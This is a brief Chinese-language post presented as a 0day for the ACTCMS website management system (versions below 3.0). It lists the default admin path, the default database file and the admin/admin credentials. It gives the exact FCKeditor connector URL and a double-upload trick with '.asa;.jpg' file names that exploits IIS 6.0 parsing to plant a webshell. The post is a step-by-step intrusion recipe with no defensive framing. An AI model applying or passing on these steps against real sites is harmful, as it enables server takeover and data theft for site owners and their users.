当前位置: 首页 > 工具软件 > ACTCMS > 使用案例 >

actcms网站管理系统漏洞0day

宋英杰
2023-12-01
漏洞版本:actcms3.0以下版本
默认后台路径:admin/
默认数据库:App_Data/DataBase.mdb
默认账户:admin
默认密码: admin
利用点:FCK编译器
漏洞界面:
admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=%2Fadmin%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Faspx%2Fconnector.aspx
利用FCK 2次 上传
可上传XXX.asa;.jpg类型
上传后会变成XXX_asa;.jpg
再次上传XXX.asa;.jpg
即可成为XXX.asa;(1).jpg
利用IIS6.0解析漏洞即可拿到webshell
 类似资料: